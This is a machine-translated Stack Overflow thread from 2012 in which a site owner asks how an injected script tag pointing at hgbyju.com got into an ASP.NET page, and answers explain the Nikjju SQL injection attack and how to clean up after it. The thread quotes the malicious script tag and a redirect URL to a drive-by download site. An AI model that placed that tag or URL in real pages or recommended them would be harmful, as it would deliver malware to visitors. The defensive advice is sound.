很难找到恶意JS系列:<script src =“http://hgbyju.com/r.php”> </script>

时间:2012-04-20 12:27:35

标签: javascript asp.net security iis-7 xss

我正在使用http://palacechemicals.co.uk/网站,该网站以某种方式感染了恶意(但良性)的JavaScript系列:

</title><script src=http://hgbyju.com/r.php ></script>

在第251行。脚本尝试加载的网址返回404,但Google仍然将我们列入恶意软件列表。

我在另一台机器上有一个干净的工作本地副本,并且手动和用软件比较了每个文件夹的文件大小,两者是相同的。我还搜索了用于将数据导入MSSQL Server 2008的SQL,用于各种不同的字符串,包括eval,script等。

我真的很难过,而且我不知道下一步要找什么。

是否有其他人遇到过这个问题或者可能会推荐下一步行动?

托管服务提供商是否会以某种方式被感染?我们在共享托管平台上,但主机相当大并且声誉良好。

任何输入都将不胜感激。 谢谢。

6 个答案:

答案 0 :(得分:2)

当我从Chrome访问该网站时,没有任何反应。但是当我从Firefox访问它时,脚本链接不会返回状态404.有一个恶意脚本会使用Emma Watson视频将我重定向到“YouTube”。

这只发生过一次。第二次是404再次。我会尝试从另一个IP地址重现它。

这是我重定向的地方:

http://www1.thebest-scanerjjn.it.cx/o9gzj2z?2nvq3n=Vtfn5per7tvJzNjp1VPozMWrmqicnZSi19quZpTVysfUosXIeJnP1KuXppuQ3aWr7edqlNbRyZ%2FH0rpzmdLQ36Ld09jkpOOc1JaruLOLy9WwrF2hmZSclqKhmJ9jopzkp8%2Fo3diflpnrltegl6eL5t7Wq2ufpqaYoqadl5KWmeigsJSUoZmrnJ%2BjZJ%2Bc1aLb1dHTn9zq62Ch1sLUyuLU2NOm5eXjnpzX19KI1NTZm%2Bugw9zH6eOQ4JfUs9mn4uSNmKOKpbpSpanRz9HTzc%2FRmtPj2pbP4NuTxdSh6ZiYlaeS

不要去那里。有一个可执行文件试图下载,谁知道还有什么。

因此脚本有效,并不总是返回404.在删除恶意链接后,您应该认真检查网站的安全性。

  • 更改所有密码;
  • 如果您使用CMS,请将其更新为最新版本;
  • 如果是自行开发的网站,请对SQL注入和其他类型的安全漏洞进行审核。

答案 1 :(得分:1)

如果没有进一步的信息,我猜最简单的原因是最可能的:您的密码已被盗用,攻击者已直接更改了您的脚本。

  • 更正其中包含该行的页面/脚本。这可能意味着从您的干净副本重新加载整个站点,只是为了安全起见 - 攻击者可能有一个脚本可以动态改变文件。
  • 使用强密码更改所有管理密码。

[我一直使用强密码,但至少有一个网站用作文件服务器。攻击者没有改变我的任何事情,但本可以做到。删除他们的内容和更改密码似乎已经修复了这一点。]

答案 2 :(得分:1)

您应该搜索十进制和十六进制的HTML实体,而不是搜索明文。

例如:

&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;script

的十六进制

&#x003c;&#x003e;<>

的十六进制

如果您使用的是带有.NET 3.5的WebForms并且未正确清理输入字符串,那么脚本注入的可能性很大。如果您已在任何页面上关闭了请求验证,则应根据这些替代输入测试这些页面。

就个人而言,我会查看受感染网页上的所有数据驱动输入,并扫描html实体的数据,而不仅仅是evalscript等常用字词。

编辑:html实体应始终以&#开头,这样可以比搜索十六进制,十进制,unicode等关键字更容易搜索。

答案 3 :(得分:1)

您的网站容易受到SQLi攻击,因此会一次又一次地受到感染。

此致 DeltaR

答案 4 :(得分:1)

  

托管服务提供商是否会以某种方式被感染?我们在共享托管平台上,但主机相当大并且声誉良好。

阅读Chrome malware diagnostic for your site。如果您点击诊断中的链接AS15418 (FASTHOSTS),它会显示主机服务有很多被感染的网站:

  

Google访问此网络上托管的网站时发生了什么?

     
    

我们在过去90天内在此网络上测试过的45254个网站 885个网站,包括lalydesign.co.uk/,consolegaming.eu/ ,nimbiz.com/,提供的内容导致在未经用户同意的情况下下载和安装恶意软件。

         

Google最后一次测试此网络中的网站时间是2012-04-23,最后一次发现可疑内容的时间是2012-04-23。

  
     

...

     

此网络是否托管了分布式恶意软件的网站?

     
    

是的,此网络托管了过去90天内分发了恶意软件的网站。我们发现 35个网站,包括,例如,hipsxpress.co.uk /,qpscars.co.uk /,aroundbritain.co.uk /,感染 58其他网站( s),包括,例如,meb.gov.tr /,opes.go.th /,stephenbrowning.co.uk /.

  

我猜您应该对它们施加压力(编辑)以插入安全问题或更改托管服务。

答案 5 :(得分:0)

很多网站都遭到了此次攻击的攻击。针对易受攻击的ASP网站的网络犯罪分子。

黑客通过利用您网站中的SQL Injection漏洞在您的网站中注入了此代码。

安全提示:

  • 分析代码:检查您网站中所有网页的源代码。不要只是搜索脚本,阅读每一行。找出 可疑代码并将其删除(确保它不是您的代码)。 注意:某些脚本可能会被编码,因此请仔细检查代码。

  • 目录中的文件:检查托管目录中是否有任何可疑文件。

  • 修补漏洞:黑客通过利用SQLi漏洞注入了此代码。所以试着找到你的弱势部分 网站并修复它。如果你不知道如何做到这一点,那就聘请一个 安全专家。你也可以使用一些自动sqli扫描仪 发现漏洞(但不是100%准确)。

  • 更改密码:修补漏洞后,请更改托管,ftp,mysql的密码。如果您使用相同的密码 在其他任何地方,然后改变他们。

的信息: 以上注射通常被称为Nikjju攻击。详情可在此处找到: Nikjju Sql Injection attack &malicious domains

相关问题
最新问题